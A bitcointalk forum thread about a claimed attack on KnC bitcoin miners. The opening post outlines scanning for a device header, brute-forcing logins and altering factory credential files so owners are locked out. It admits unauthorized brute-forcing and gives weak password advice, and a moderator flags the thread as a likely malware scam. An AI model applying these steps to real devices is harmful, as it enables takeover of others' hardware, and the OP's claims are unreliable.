KnC Miner : Security hacked - UPDATE with TOOL admin remove plz

[steve15]

Mod note: This is probably an elaborate scam to trick you into downloading malware https://bitcointalk.org/index.php?topic=392166.msg4807591#msg4807591 You should still not expose miners to public internet though

EDIT: SEE PAGE 5 FOR MY PROVE OF CONCEPT APPLICATION
Hi all,

So, what else to do in my spare time while mining some BTC? Exploiting security holes in my hardware.
It turns out that every KnC miner can be hacked within 5-10 minutes, making it possible to control the CGMiner remotely.

I've submitted a higly detailed report to KNC, explaining how i did it, and how they can patch it with a new firmware upgrade.
To avoid a huge breach, i will not reveal all details, but i give you a short summary [proof of concept].

1: Scan the internet, using a special tool, for the default KnC Miner header response

Code:

WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="f76e06a34c00b5fec1da6749d4ed0bfc", qop="auth"

EVERY miner uses this header, so in 10 seconds, i found about 1180 responses vulnerable to my attack.

2: Cricial information remains hidden for public, but the http digest can be bypassed with ease.

3: Run basic HTTP bruteforce. Since the digest is bypassed, i can run unlimited bruteforce attempts.
Within a timespan of 20 minutes, i managed to bruteforce 28 miners !! (Most of them poor passwords tough)

Now comes the fun part...

Login using SSH. If the SSH port is not enabled, simply login to the web console and enable it.

The source code of

Code:

factory_config_reset.sh

tells us exactly what we need.

VI (edit) the default factory files, as found in the factory reset code, making a second login inside the factory reset files.

The digest file requires you a special hash to create the password. This can be done using special tools, but for safety reasons, i will not go further on this part in public.

Alter these files to gain access after factory reset

Code:

/etc/shadow.factory

Code:

/etc/lighttpd.htdigest.user

Now remove all the default credentials in the factory files, making it impossible to login using the default admin:admin for the owner

RUN THE FACTORY RESET...

And enjoy your personal miner, that just became unusable to the owner, since he can no longer login.

Disclaimer:

I intend to do no harm. No miner has ever been in my control, or ever will be. I just expose this threat to put pressure on KnC to hurry their firmware upgrade.
Do not ask or PM me for information about this hack, it will not be provided !! Only KNC has the entire manual !


Note to all KnC miners out there: Please change your passwords to long, safe password!
If needed, simply hashing your firstname to MD5 will do the trick to scare away hackers.

PLEASE USE A ROUTER INSTEAD OF DIRECT INTERNET ACCESS !!!


Greetings!!

EDIT: Email to KnC

Hello KnC team,

As you might picked up on bitcointalk.org, i managed to successfully scan and exploit KnC Miner configuration software running on all your miners.
Attachted is my HowTo, showing you how i managed to succeed in this hack.

I feel, as a software developer and penetration tester, that you do not take user security in account with your services.
The only thing you care about, is selling hardware. What happens with it, seems to be the least of your concerns.

You should now that the user is always the weakest security, but instead of anticipating on that, you go with that flow.

I did not post exactly how i did it on the forum for security reasons, but however, i urge you to push a new firmware closing up those holes.
Holidays or not, i will expose the detailed howto on bitcointalk.org on January 1st 2014 at 12h00.

Once this exploit go public, you will receive a lot of complaints and behalf of your clients, and loose lots of trust in the general public.
If you have not patched your firmware, this will confirm my statement that you do not carry about user security.

I can only imagine all blogs picking up that posts just before Neptune delivery...

I just created a custom firmware patching all the security flaws, it took me about one hour.
So surely, your developers can do the trick also.

For the sake of the general public, who have put their trust and funds in you, please patch up your firmware!!

EDIT: SEE PAGE 5 FOR MY PROVE OF CONCEPT APPLICATION

[1715630511]

1715630511

[1715630511]

1715630511

[ArpFlush]

I don't have a KNC but thank you for the info. Other miners maybe vulnerable too and a really good password is a must. I'm not a network expert but hiding your miner hardware behind a router is a great idea IMHO. So thanks 

[kano]

... API ...

[1l1l11ll1l]

And everyone thought this was HashFast, well played OP!

http://eligius.st/~wizkid057/newstats/userstats.php/1Nbq2XZaRsKknf5fcT2wTXvBS31PaUWSeX

[Soros Shorts]

PLEASE USE A ROUTER INSTEAD OF DIRECT INTERNET ACCESS !!!

It also goes without saying that you should not use port forwarding direct to the miner (for remote access) when using a router. I have heard of some people doing this. Best to use some kind of intermediate jump box that can be locked down more securely than the beagle bone.

[vpasic]

And everyone thought this was HashFast, well played OP!

http://eligius.st/~wizkid057/newstats/userstats.php/1Nbq2XZaRsKknf5fcT2wTXvBS31PaUWSeX

LMFAO!!!

[traiz]

Hi all,

So, what else to do in my spare time while mining some BTC? Exploiting security holes in my hardware.
It turns out that every KnC miner can be hacked within 5-10 minutes, making it possible to control the CGMiner remotely.

I've submitted a higly detailed report to KNC, explaining how i did it, and how they can patch it with a new firmware upgrade.
To avoid a huge breach, i will not reveal all details, but i give you a short summary [proof of concept].

1: Scan the internet, using a special tool, for the default KnC Miner header response

Code:

WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="f76e06a34c00b5fec1da6749d4ed0bfc", qop="auth"

EVERY miner uses this header, so in 10 seconds, i found about 1180 responses vulnerable to my attack.

2: Cricial information remains hidden for public, but the http digest can be bypassed with ease.

3: Run basic HTTP bruteforce. Since the digest is bypassed, i can run unlimited bruteforce attempts.
Within a timespan of 20 minutes, i managed to bruteforce 28 miners !! (Most of them poor passwords tough)

Now comes the fun part...

Login using SSH. If the SSH port is not enabled, simply login to the web console and enable it.

The source code of

Code:

factory_config_reset.sh

tells us exactly what we need.

VI (edit) the default factory files, as found in the factory reset code, making a second login inside the factory reset files.

The digest file requires you a special hash to create the password. This can be done using special tools, but for safety reasons, i will not go further on this part in public.

Alter these files to gain access after factory reset

Code:

/etc/shadow.factory

Code:

/etc/lighttpd.htdigest.user

Now remove all the default credentials in the factory files, making it impossible to login using the default admin:admin for the owner

RUN THE FACTORY RESET...

And enjoy your personal miner, that just became unusable to the owner, since he can no longer login.

Disclaimer:

I intend to do no harm. No miner has ever been in my control, or ever will be. I just expose this threat to put pressure on KnC to hurry their firmware upgrade.
Do not ask or PM me for information about this hack, it will not be provided !! Only KNC has the entire manual !


Note to all KnC miners out there: Please change your passwords to long, safe password!
If needed, simply hashing your firstname to MD5 will do the trick to scare away hackers.

PLEASE USE A ROUTER INSTEAD OF DIRECT INTERNET ACCESS !!!


Greetings!!

EDIT: Email to KnC

Hello KnC team,

As you might picked up on bitcointalk.org, i managed to successfully scan and exploit KnC Miner configuration software running on all your miners.
Attachted is my HowTo, showing you how i managed to succeed in this hack.

I feel, as a software developer and penetration tester, that you do not take user security in account with your services.
The only thing you care about, is selling hardware. What happens with it, seems to be the least of your concerns.

You should now that the user is always the weakest security, but instead of anticipating on that, you go with that flow.

I did not post exactly how i did it on the forum for security reasons, but however, i urge you to push a new firmware closing up those holes.
Holidays or not, i will expose the detailed howto on bitcointalk.org on January 1st 2014 at 12h00.

Once this exploit go public, you will receive a lot of complaints and behalf of your clients, and loose lots of trust in the general public.
If you have not patched your firmware, this will confirm my statement that you do not carry about user security.

I can only imagine all blogs picking up that posts just before Neptune delivery...

I just created a custom firmware patching all the security flaws, it took me about one hour.
So surely, your developers can do the trick also.

For the sake of the general public, who have put their trust and funds in you, please patch up your firmware!!

Aren't the details already public?
Correct me if I'm wrong, but aren't you in effect trying to create a custom rom like bertmod?
The hash information is already out there...

[steve15]

No, the details are not public yet.
There is a significant difference in making a custom rom, and explaining how you can gain access to thousands of remote miners out there.

Custom ROM is intented to use on your own hardware.

My hack is intented to remotely control another miner, making it useless to the owner, since he can no longer login.

[traiz]

No, the details are not public yet.
There is a significant difference in making a custom rom, and explaining how you can gain access to thousands of remote miners out there.

Custom ROM is intented to use on your own hardware.

My hack is intented to remotely control another miner, making it useless to the owner, since he can no longer login.

Ok.
But just wanted to check its different than brute-forcing the credentials of the remote miner
And loading your custom rom on it.

And would like to confirm that a true factory reset (not software - but the physical hold for 5 seconds to load image from rom, etc)
is unable to restore the miner to its default.

[steve15]

No, the details are not public yet.
There is a significant difference in making a custom rom, and explaining how you can gain access to thousands of remote miners out there.

Custom ROM is intented to use on your own hardware.

My hack is intented to remotely control another miner, making it useless to the owner, since he can no longer login.

Ok.
But just wanted to check its different than brute-forcing the credentials of the remote miner
And loading your custom rom on it.

And would like to confirm that a true factory reset (not software - but the physical hold for 5 seconds to load image from rom, etc)
is unable to restore the miner to its default.

Code:

DESCRIPTION = "Daemon to monitor power button"
LICENSE = "GPL"
LIC_FILES_CHKSUM = "file://COPYING;md5=d41d8cd98f00b204e9800998ecf8427e"

SRC_URI = "file://monitor-pwbtn.c \
        file://init \
        file://factory_config_reset.sh \
        file://COPYING \
"

S = "${WORKDIR}"

do_compile() {
        make monitor-pwbtn
}

do_install() {
        install -d ${D}${bindir}
        install -m 0755 ${WORKDIR}/monitor-pwbtn ${D}${bindir}
        install -m 0755 ${WORKDIR}/factory_config_reset.sh ${D}${bindir}

        install -d ${D}${sysconfdir}/init.d
        install -m 0755 ${WORKDIR}/init ${D}${sysconfdir}/init.d/monitor-pwbtn
        update-rc.d -r ${D} monitor-pwbtn start 70 S .
}

A 'true' factory reset does exactly the same on sofware level then a 'software' factory reset
Just some minor details change, the miner connects to a server of KnC to get some info, that's it.

[philipma1957]

Hi all,

So, what else to do in my spare time while mining some BTC? Exploiting security holes in my hardware.
It turns out that every KnC miner can be hacked within 5-10 minutes, making it possible to control the CGMiner remotely.

I've submitted a higly detailed report to KNC, explaining how i did it, and how they can patch it with a new firmware upgrade.
To avoid a huge breach, i will not reveal all details, but i give you a short summary [proof of concept].

1: Scan the internet, using a special tool, for the default KnC Miner header response

Code:

WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="f76e06a34c00b5fec1da6749d4ed0bfc", qop="auth"

EVERY miner uses this header, so in 10 seconds, i found about 1180 responses vulnerable to my attack.

2: Cricial information remains hidden for public, but the http digest can be bypassed with ease.

3: Run basic HTTP bruteforce. Since the digest is bypassed, i can run unlimited bruteforce attempts.
Within a timespan of 20 minutes, i managed to bruteforce 28 miners !! (Most of them poor passwords tough)

Now comes the fun part...

Login using SSH. If the SSH port is not enabled, simply login to the web console and enable it.

The source code of

Code:

factory_config_reset.sh

tells us exactly what we need.

VI (edit) the default factory files, as found in the factory reset code, making a second login inside the factory reset files.

The digest file requires you a special hash to create the password. This can be done using special tools, but for safety reasons, i will not go further on this part in public.

Alter these files to gain access after factory reset

Code:

/etc/shadow.factory

Code:

/etc/lighttpd.htdigest.user

Now remove all the default credentials in the factory files, making it impossible to login using the default admin:admin for the owner

RUN THE FACTORY RESET...

And enjoy your personal miner, that just became unusable to the owner, since he can no longer login.

Disclaimer:

I intend to do no harm. No miner has ever been in my control, or ever will be. I just expose this threat to put pressure on KnC to hurry their firmware upgrade.
Do not ask or PM me for information about this hack, it will not be provided !! Only KNC has the entire manual !


Note to all KnC miners out there: Please change your passwords to long, safe password!
If needed, simply hashing your firstname to MD5 will do the trick to scare away hackers.

PLEASE USE A ROUTER INSTEAD OF DIRECT INTERNET ACCESS !!!


Greetings!!

EDIT: Email to KnC

Hello KnC team,

As you might picked up on bitcointalk.org, i managed to successfully scan and exploit KnC Miner configuration software running on all your miners.
Attachted is my HowTo, showing you how i managed to succeed in this hack.

I feel, as a software developer and penetration tester, that you do not take user security in account with your services.
The only thing you care about, is selling hardware. What happens with it, seems to be the least of your concerns.

You should now that the user is always the weakest security, but instead of anticipating on that, you go with that flow.

I did not post exactly how i did it on the forum for security reasons, but however, i urge you to push a new firmware closing up those holes.
Holidays or not, i will expose the detailed howto on bitcointalk.org on January 1st 2014 at 12h00.

Once this exploit go public, you will receive a lot of complaints and behalf of your clients, and loose lots of trust in the general public.
If you have not patched your firmware, this will confirm my statement that you do not carry about user security.

I can only imagine all blogs picking up that posts just before Neptune delivery...

I just created a custom firmware patching all the security flaws, it took me about one hour.
So surely, your developers can do the trick also.

For the sake of the general public, who have put their trust and funds in you, please patch up your firmware!!

Quite frankly after   read this I think you owe  coins to us on this thread:

https://bitcointalk.org/index.php?topic=334360.0

I believe you screwed up our 2 miners
we have a 2-3 day coin less gap

https://blockchain.info/address/19NAwha8LGpRFEBwRgjH5ZMB9YyXeqyY9V

https://blockchain.info/address/13fGQGmb6Xi576ppJTkeXk34yDDRmvxjm4

 (Eleuthria )
this direct appeared on both out payout addresses and we lost coins..  the timing matches to your playing around with out 2 miners  along with 1100 other miners.

[steve15]

Quite frankly after   read this I think you owe  coins to us on this thread:

https://bitcointalk.org/index.php?topic=334360.0

I believe you screwed up our 2 miners
we have a 2-3 day coin less gap

https://blockchain.info/address/19NAwha8LGpRFEBwRgjH5ZMB9YyXeqyY9V

https://blockchain.info/address/13fGQGmb6Xi576ppJTkeXk34yDDRmvxjm4

 (Eleuthria )
this direct appeared on both out payout addresses and we lost coins..  the timing matches to your playing around with out 2 miners  along with 1100 other miners.

I intend to do no harm. No miner has ever been in my control, or ever will be.

Why should i screw with 2 miners, while i have 6 jupiters standing here.
Also, why screw with miners who are pwd protected, while there are hundres of miners with default login.

And mostly, why would i post a topic after screwing with miners.

Think about it ;-)

[philipma1957]

I did think about it. I found it to be   bad timing on your part to announce you did this and that the announcement matches very odd behaviour  of our miners. What I would like to know is how many miners other then the two  mention have this problem which is why I posted this here.  You have admitted you viewed 1100 plus miners.  if only the two I mention have this problem after being viewed by you then most likely this has nothing to do with your testing.

[steve15]

I did think about it. I found it to be   bad timing on your part to announce you did this and that the announcement matches very odd behaviour  of our miners. What I would like to know is how many miners other then the two  mention have this problem which is why I posted this here.  You have admitted you viewed 1100 plus miners.  if only the two I mention have this problem after being viewed by you then most likely this has nothing to do with your testing.

Well, just wait until the post goes public then! Hurry up and push KnC to patch up.
Can you imagine the horror once i post the full details?

For your information; the +1100 miners are public available on the net, everybody can scan and see them.
I bruteforced 28 logins, but i never actually logged in. Dont you know your KnC has a log? CHECK YOUR LOG BEFORE THROWING MUD!!!

[Bogart]

Of course this kind of thing is a risk if you use a weak password and then forward the ports to allow incoming connections directly from the big bad internet.  Duh.  This goes for any device.

[philipma1957]

I did think about it. I found it to be   bad timing on your part to announce you did this and that the announcement matches very odd behaviour  of our miners. What I would like to know is how many miners other then the two  mention have this problem which is why I posted this here.  You have admitted you viewed 1100 plus miners.  if only the two I mention have this problem after being viewed by you then most likely this has nothing to do with your testing.

Well, just wait until the post goes public then! Hurry up and push KnC to patch up.
Can you imagine the horror once i post the full details?

For your information; the +1100 miners are public available on the net, everybody can scan and see them.
I bruteforced 28 logins, but i never actually logged in. Dont you know your KnC has a log? CHECK YOUR LOG BEFORE THROWING MUD!!!

 So you attacked 28 logins of the 1100 plus miners and you were successful with them. your words not mine .  you claim to own 2 machines  so at best 26 miners are not yours.  did you get permission to try them?  so I do I know if one   or both of the machines I own shares in were not damaged by you?

 causing them to lose about .5btc each in hash.  look If no one comes to the thread other then me then maybe the 28 machines you hacked were not injured in terms of hash power. but  announcing to the world that you hacked /brute forced 28 machines puts you at risk for damages.  Any one including me and my 9.5 percent share of 2 Jupiter's (about 100gh) can say your  actions caused them harm. Frankly I am posting this here to say that brute forcing some ones password with out permission is not to clever in terms of liability .

  Can you prove the 28 machines  that were brute forced were not damaged? Can you prove you did not attack the machines I own a piece of?  Most people do not realize that for civil damage the proof is not  as high as it is for criminal damage.  So I am not slinging any mud I am pointing out that you may have set yourself up for problems. you should have asked for 30 knc owners to be testers.  

If you had permission to do a brute force attack on the 28 machines you should have told us that right up front.

[soothaa]

I did think about it. I found it to be   bad timing on your part to announce you did this and that the announcement matches very odd behaviour  of our miners. What I would like to know is how many miners other then the two  mention have this problem which is why I posted this here.  You have admitted you viewed 1100 plus miners.  if only the two I mention have this problem after being viewed by you then most likely this has nothing to do with your testing.

Holy shit the entitlement here!

[philipma1957]

I did think about it. I found it to be   bad timing on your part to announce you did this and that the announcement matches very odd behaviour  of our miners. What I would like to know is how many miners other then the two  mention have this problem which is why I posted this here.  You have admitted you viewed 1100 plus miners.  if only the two I mention have this problem after being viewed by you then most likely this has nothing to do with your testing.

Holy shit the entitlement here!

 

no not about entitlement.  he admits to attacking passwords of 28 miners. and in no place does he say he had permission.  the 2 miners I own 9.5 % of had a hashing issue during the time he was brute forcing miners.


 if I go to a gym locker and try a 3 digit combo lock 20 times a day until it clicks open I am breaking the law in most counties. even if I push it locked again.


the op admits to doing this with knc passwords.  so dude this is not about entitlement.  this is about the op admitting to attacking passwords on valuable gear. I am not the op. I am a part owner of 2 machines that  the op may have attacked.     so 28/1100 = 2.5% chance but I have 2 machines so about 5% chance he tried on my gear.  my gear had a loss unexplained loss of hash power.  what do you expect me to think?

[runderwo]

what do you expect me to think?

That you should have some evidence beyond pure circumstance before slinging around legal threats?

Would you somehow have been better off if OP had been intimidated by legal liabilities into never discovering and posting this information?

P.S. If you don't want people "attacking" your gear through a public IP interface, simply configure it to not fulfill requests so promptly and politely.  Is it that difficult?

[philipma1957]

what do you expect me to think?

That you should have some evidence beyond pure circumstance before slinging around legal threats?

Would you somehow have been better off if OP had been intimidated by legal liabilities into never discovering and posting this information?

P.S. If you don't want people "attacking" your gear through a public IP interface, simply configure it to not fulfill requests so promptly and politely.  Is it that difficult?

first off I am not the op.  i did not brute force 28 knc machines he did.  now when he did the brute force on the 28 machines he did not tell us he had permission to do it. so stop defending him for  doing something that is not legal.

 did his brute force attack hurt this person?

https://bitcointalk.org/index.php?topic=31163.msg4140767#msg4140767

maybe I do not know but time wise it matches.  was he off line for 3 or 5 hours extra due to the password attack ? do not know.  I ask you this. would you want someone coming to the front door of your home and testing your door knob to see if it opens easily ?  

  so to the op  did you have permission to attack the 28 machines? yes or no?  my apologies if you informed those miners. before you attacked them

[Darkhand]

No logs posted, just a troll.  Post logs and everyone will be on your side.  Take your pick!

[traiz]

what do you expect me to think?

That you should have some evidence beyond pure circumstance before slinging around legal threats?

Would you somehow have been better off if OP had been intimidated by legal liabilities into never discovering and posting this information?

P.S. If you don't want people "attacking" your gear through a public IP interface, simply configure it to not fulfill requests so promptly and politely.  Is it that difficult?

first off I am not the op.  i did not brute force 28 knc machines he did.  now when he did the brute force on the 28 machines he did not tell us he had permission to do it. so stop defending him for  doing something that is not legal.

 did his brute force attack hurt this person?

https://bitcointalk.org/index.php?topic=31163.msg4140767#msg4140767

maybe I do not know but time wise it matches.  was he off line for 3 or 5 hours extra due to the password attack ? do not know.  I ask you this. would you want someone coming to the front door of your home and testing your door knob to see if it opens easily ?  

  so to the op  did you have permission to attack the 28 machines? yes or no?  my apologies if you informed those miners. before you attacked them

Wait... the OP is kind enough to inform us of a possible exploit and you're nailing him for it???
I rather this type of information is made public than kept under wraps and have "hackers" exploit it.

Besides, if you have a machine directly connected to the internet, you should sort of expect something like this to happen.

I mean if someone had remote access to your machine, locking you out should be the least of your concerns (since you would know something was wrong).
Instead, they could have reflashed your machine with a custom rom who's gui looks exactly like the standard knc one, but is set to mine for them on a part time basis (but also keep your settings as well).
Then you're paying resources to mine for them, all the while thinking your miner was defective/had stale shares. Not knowing its compromised.

It's even worst if they had it randomly mine for them on one of the larger pools (that only requires an address) - say like 2am to 6am, 10am to 12pm, then 2pm to 4pm. While occasionally submitting shares to your pools so it doesn't time out and alert you.

Then again, if this was a troll post, good job.
You got me

[Tigggger]

Wait... the OP is kind enough to inform us of a possible exploit and you're nailing him for it???
I rather this type of information is made public than kept under wraps and have "hackers" exploit it.

My thoughts exactly, thank you OP for doing the honourable thing and giving users a chance to lock down their machines before someone less honest found it.

[astutiumRob]

Well, it's either the OP or someone following their instructions ...

Have helped a couple of colo clients with hacked KNC kit today.

At least one of the brute-force attacks is coming from
109.201.154.184

Investigation into one hacked miner shows 1J7PH3SSzMLgrGZEkjQbq6Ls5LjQwpkAGq
http://eligius.st/~wizkid057/newstats/userstats.php/1J7PH3SSzMLgrGZEkjQbq6Ls5LjQwpkAGq
being used - and that's had a *huge* hashrate increase today

[timmmers]

Thanks to the OP for the warning, hopefully no-one lost due to this. Got to say that it's a fairly obvious target for anyone with skills and the mindset to try this eventually.
Could have been worse, could have been 2 months ago by someone sensible enough not to be greedy and milk a lot of rigs a little each day.
Posting ANY details was a bit "look at me" though, no need for that here, just warn KNC and advise the PW changes needed etc.

As for the rigs mentioned that seem to have lost some hashing, if they are on Slush there was a problem recently where earnings were deducted or some such nonsense which may account for that..which has been remedied now.

[steve15]

Yes, well posting ANY DETAILS should put the pressure on KnC to patch up their firmware.

To the person claiming i hacked their rig, i bruteforce 28 miners under 20 minutes, that's about 50 seconds/miner.
What are you complaining about 3 hours non activity for you miner?

Second of all, your http is seperated from the mining activity itself. Even if i bruteforce your miner for 24h, you'll never notice this.

Third of all, POST SOME LOGS THEN!!! That's why logs are made for anyway.

Last but not least, if i DID hacked your machine, it would not even be visible to you.

I am not a 15yr old scriptkiddie trying to hack into every account i see.
I'm a 30+ professional security penetration tester.

But fine to me, next time, i'll post nothing, and get your rigs hacked then.
Underground is already offering me +150 BTC for all details, be glad i keep it to myself instead of thinking i would hack your lame rig with almost no profit according to your blockchain....

Bitcoin is about the community. That's why i keep this public and not underground, so all users can patch up before massive attacks start!
Or are you so naive to think i'm the only one who can discover this...

[philipma1957]

Yes, well posting ANY DETAILS should put the pressure on KnC to patch up their firmware.

To the person claiming i hacked their rig, i bruteforce 28 miners under 20 minutes, that's about 50 seconds/miner.
What are you complaining about 3 hours non activity for you miner?

Second of all, your http is seperated from the mining activity itself. Even if i bruteforce your miner for 24h, you'll never notice this.

Third of all, POST SOME LOGS THEN!!! That's why logs are made for anyway.

Last but not least, if i DID hacked your machine, it would not even be visible to you.

I am not a 15yr old scriptkiddie trying to hack into every account i see.
I'm a 30+ professional security penetration tester.

But fine to me, next time, i'll post nothing, and get your rigs hacked then.
Underground is already offering me +150 BTC for all details, be glad i keep it to myself instead of thinking i would hack your lame rig with almost no profit according to your blockchain....

Bitcoin is about the community. That's why i keep this public and not underground, so all users can patch up before massive attacks start!
Or are you so naive to think i'm the only one who can discover this...

 Okay I call myself jaded  and suspicious .  Thanks for your efforts to warn us.

[padrino]

Yes, well posting ANY DETAILS should put the pressure on KnC to patch up their firmware.

To the person claiming i hacked their rig, i bruteforce 28 miners under 20 minutes, that's about 50 seconds/miner.
What are you complaining about 3 hours non activity for you miner?

Second of all, your http is seperated from the mining activity itself. Even if i bruteforce your miner for 24h, you'll never notice this.

Third of all, POST SOME LOGS THEN!!! That's why logs are made for anyway.

Last but not least, if i DID hacked your machine, it would not even be visible to you.

I am not a 15yr old scriptkiddie trying to hack into every account i see.
I'm a 30+ professional security penetration tester.

But fine to me, next time, i'll post nothing, and get your rigs hacked then.
Underground is already offering me +150 BTC for all details, be glad i keep it to myself instead of thinking i would hack your lame rig with almost no profit according to your blockchain....

Bitcoin is about the community. That's why i keep this public and not underground, so all users can patch up before massive attacks start!
Or are you so naive to think i'm the only one who can discover this...

I'm glad you posted of the issue and think it's good to make the community aware of the issue, but as a professional penetration tester (since you keep bringing it up) I would think you would follow industry best practices and not post the technical details in your initial posting, but give the vendor time to address the issue.

In addition to that it's not even a hack, but a weakness in a vanilla vendor configuration putting users at risk.

I think you have the best intentions in mind but you are not conducting yourself as professionally as you could, especially given your career...

[steve15]

I'm glad you posted of the issue and think it's good to make the community aware of the issue, but as a professional penetration tester (since you keep bringing it up) I would think you would follow industry best practices and not post the technical details in your initial posting, but give the vendor time to address the issue.

In addition to that it's not even a hack, but a weakness in a vanilla vendor configuration putting users at risk.

I think you have the best intentions in mind but you are not conducting yourself as professionally as you could, especially given your career...

Since KnC does not reply when i attempt to warn them, the best way to bring things to their attention is by involving the users/owners/customers.

The information i posted here, is nothing more than public source information as shown on their own Github page.

Believe me, no critical information is display on this forum. The information provided here is useless to so called 'hackers' trying to abuse miners.
If all details that i supplied to KnC are leaked, all public online miners are hacked within a 2 hour timespan.

I'm not looking to receive credits, badges or rewards by this exploit. I just want to prevent a massive miner attack.

[padrino]

I'm glad you posted of the issue and think it's good to make the community aware of the issue, but as a professional penetration tester (since you keep bringing it up) I would think you would follow industry best practices and not post the technical details in your initial posting, but give the vendor time to address the issue.

In addition to that it's not even a hack, but a weakness in a vanilla vendor configuration putting users at risk.

I think you have the best intentions in mind but you are not conducting yourself as professionally as you could, especially given your career...

Since KnC does not reply when i attempt to warn them, the best way to bring things to their attention is by involving the users/owners/customers.

The information i posted here, is nothing more than public source information as shown on their own Github page.

Believe me, no critical information is display on this forum. The information provided here is useless to so called 'hackers' trying to abuse miners.
If all details that i supplied to KnC are leaked, all public online miners are hacked within a 2 hour timespan.

I'm not looking to receive credits, badges or rewards by this exploit. I just want to prevent a massive miner attack.

Fair enough, apologize for jumping too quick on it.. A quick glance at your first post indicated enough was available, didn't realize it was missing some things...

[bitnpieces]

Wow I cant believe some people are jumping down your throat, I think you have done a great service to these guys by finding and highlighting these risks.

[af_newbie]

Hi all,

So, what else to do in my spare time while mining some BTC? Exploiting security holes in my hardware.
It turns out that every KnC miner can be hacked within 5-10 minutes, making it possible to control the CGMiner remotely.

I've submitted a higly detailed report to KNC, explaining how i did it, and how they can patch it with a new firmware upgrade.
To avoid a huge breach, i will not reveal all details, but i give you a short summary [proof of concept].

1: Scan the internet, using a special tool, for the default KnC Miner header response

Code:

WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="f76e06a34c00b5fec1da6749d4ed0bfc", qop="auth"

EVERY miner uses this header, so in 10 seconds, i found about 1180 responses vulnerable to my attack.

Don't use Internet to access your miners directly. 

Use some sort of API aggregation web page (https) to list status of all miners, restart them or power cycle them.  Protect that page with user login and https.
Port forward your Internet connections to that page.

[steve15]

Wow I cant believe some people are jumping down your throat, I think you have done a great service to these guys by finding and highlighting these risks.

Thank you sir!

[kano]

...
Don't use Internet to access your miners directly. 

Use some sort of API aggregation web page (https) to list status of all miners, restart them or power cycle them.  Protect that page with user login and https.
Port forward your Internet connections to that page.

cgminer already has all this by default - I wrote it - but no idea if KnC enabled it or not.

[af_newbie]

...
Don't use Internet to access your miners directly.  

Use some sort of API aggregation web page (https) to list status of all miners, restart them or power cycle them.  Protect that page with user login and https.
Port forward your Internet connections to that page.

cgminer already has all this by default - I wrote it - but no idea if KnC enabled it or not.

I meant a page like your api-example.php.  If you have 10 miners (on 10 different IPs) and one rPi watchdog.  On that watchdog, have a page that would go
to 10 IPs and fetch API summaries, format and display.  Something like

https://bitcointalk.org/index.php?topic=222632.0

rPi gpio ports that can be used to drive relays (via a simple transistor driver) to power cycle the miners (waiting for my relays to try this).
Got the gpio ports working (set them on 3.3V/off 0.4V), but not from the web server (requires access to sysfs).  Work in progress...

Something like
http://code.google.com/p/raspberrypi-gpio/downloads/list  but it uses mySQL, which is an overkill to do this if you ask me.

[mostclicked]

OP is not bluffing. I can retrieve the IP addresses of KNC Miners from available search engine. The IP addresses are removed for security reason. Search result examples:

Added on 01.01.2014
United States New York
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="354d48be494a88e6eccd16cdc7a1f67d", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Wed, 01 Jan 2014 05:39:41 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
United States Englewood
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="3b7e9df094c80de0a73e05bc14066075", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 22:50:39 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
Netherlands
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="71e7f1f82e328c05cf4d406705270c25", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 20:23:39 GMT
Server: lighttpd/1.4.32

[steve15]

OP is not bluffing. I can retrieve the IP addresses of KNC Miners from available search engine. The IP addresses are removed for security reason. Search result examples:

Added on 01.01.2014
United States New York
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="354d48be494a88e6eccd16cdc7a1f67d", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Wed, 01 Jan 2014 05:39:41 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
United States Englewood
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="3b7e9df094c80de0a73e05bc14066075", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 22:50:39 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
Netherlands
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="71e7f1f82e328c05cf4d406705270c25", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 20:23:39 GMT
Server: lighttpd/1.4.32

By the look of your results i know how you found them, but it's a very bad tool to use.
It will only bring up about +/- 130 results, 3/4 of then are already dead.

[pdawg]

Steve is helping here.  He could have easily done this without posting anything and made a good amount of coin. Give the guy a break.

[mostclicked]

OP is not bluffing. I can retrieve the IP addresses of KNC Miners from available search engine. The IP addresses are removed for security reason. Search result examples:

Added on 01.01.2014
United States New York
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="354d48be494a88e6eccd16cdc7a1f67d", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Wed, 01 Jan 2014 05:39:41 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
United States Englewood
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="3b7e9df094c80de0a73e05bc14066075", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 22:50:39 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
Netherlands
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="71e7f1f82e328c05cf4d406705270c25", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 20:23:39 GMT
Server: lighttpd/1.4.32

By the look of your results i know how you found them, but it's a very bad tool to use.
It will only bring up about +/- 130 results, 3/4 of then are already dead.

Yup it's bad. Just want to demonstrate the possibility of finding the IPs.

[steve15]

Steve is helping here.  He could have easily done this without posting anything and made a good amount of coin. Give the guy a break.

A tip is also welcome :-D

[bitpop]

Op owes no one anything, he could have changed all your pools to his

Second who the hell opens the ports?

[steve15]

Op owes no one anything, he could have changed all your pools to his

Second who the hell opens the ports?

